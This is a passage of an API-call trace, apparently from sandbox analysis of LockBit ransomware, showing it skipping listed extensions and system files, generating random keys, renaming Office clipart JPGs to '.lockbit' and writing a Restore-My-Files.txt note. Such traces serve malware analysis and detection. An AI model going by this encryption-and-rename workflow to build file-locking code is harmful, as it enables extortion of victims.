returned 1 [0168.027] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01046J.JPG") returned 1 [0168.027] lstrcmpiW (lpString1="ntldr", lpString2="PH01046J.JPG") returned -1 [0168.028] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01046J.JPG") returned -1 [0168.028] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01046J.JPG") returned -1 [0168.028] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01046J.JPG") returned -1 [0168.028] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01046J.JPG") returned 1 [0168.028] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01046J.JPG") returned -1 [0168.028] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.028] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG") returned=".JPG" [0168.028] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.028] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.028] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0168.028] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.028] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.028] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.028] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.029] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.029] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG.lockbit") returned 72 [0168.029] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01046j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0168.033] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.033] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.033] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=135611) returned 1 [0168.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.035] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.037] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.037] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.037] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.038] free (_Block=0x1fa2ed8) [0168.038] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.038] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.038] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.038] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd4a3a00, ftCreationTime.dwHighDateTime=0x1bd50ad, ftLastAccessTime.dwLowDateTime=0x5a3d9150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcd4a3a00, ftLastWriteTime.dwHighDateTime=0x1bd50ad, nFileSizeHigh=0x0, nFileSizeLow=0xa202, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01179J.JPG", cAlternateFileName="")) returned 1 [0168.038] lstrcmpiW (lpString1=".", lpString2="PH01179J.JPG") returned -1 [0168.038] lstrcmpiW (lpString1="..", lpString2="PH01179J.JPG") returned -1 [0168.038] PathFindExtensionW (pszPath="PH01179J.JPG") returned=".JPG" [0168.038] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.038] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.039] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.039] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.040] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.040] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.040] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.040] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.040] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.040] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.040] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.040] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01179J.JPG") returned 1 [0168.040] lstrcmpiW (lpString1="ntldr", lpString2="PH01179J.JPG") returned -1 [0168.040] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01179J.JPG") returned -1 [0168.040] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01179J.JPG") returned -1 [0168.040] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01179J.JPG") returned -1 [0168.040] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01179J.JPG") returned 1 [0168.040] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01179J.JPG") returned -1 [0168.041] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.041] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG") returned=".JPG" [0168.041] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0168.041] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.041] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.042] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.042] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.042] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG.lockbit") returned 72 [0168.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01179j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0168.042] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.043] malloc (_Size=0x40068) returned 0x3d70450 [0168.043] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=41474) returned 1 [0168.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0168.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0168.044] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0168.048] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.048] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.048] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.049] free (_Block=0x1fa2ed8) [0168.049] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.049] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.049] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x18be, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01213K.JPG", cAlternateFileName="")) returned 1 [0168.049] lstrcmpiW (lpString1=".", lpString2="PH01213K.JPG") returned -1 [0168.049] lstrcmpiW (lpString1="..", lpString2="PH01213K.JPG") returned -1 [0168.049] PathFindExtensionW (pszPath="PH01213K.JPG") returned=".JPG" [0168.049] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.049] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.049] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.049] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.049] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.049] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.049] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.049] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.049] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.049] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.049] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.050] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.050] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.051] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.051] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.051] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.051] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.051] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.051] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01213K.JPG") returned 1 [0168.051] lstrcmpiW (lpString1="ntldr", lpString2="PH01213K.JPG") returned -1 [0168.051] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01213K.JPG") returned -1 [0168.051] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01213K.JPG") returned -1 [0168.051] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01213K.JPG") returned -1 [0168.051] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01213K.JPG") returned 1 [0168.051] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01213K.JPG") returned -1 [0168.051] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.051] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG") returned=".JPG" [0168.051] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.051] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.051] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.051] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0168.052] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.052] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.052] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG.lockbit") returned 72 [0168.052] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01213k.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0168.053] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.053] malloc (_Size=0x40068) returned 0x3f70048 [0168.053] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=6334) returned 1 [0168.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0168.054] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0168.054] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0168.118] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.118] malloc (_Size=0xa6) returned 0x1fa2ed8 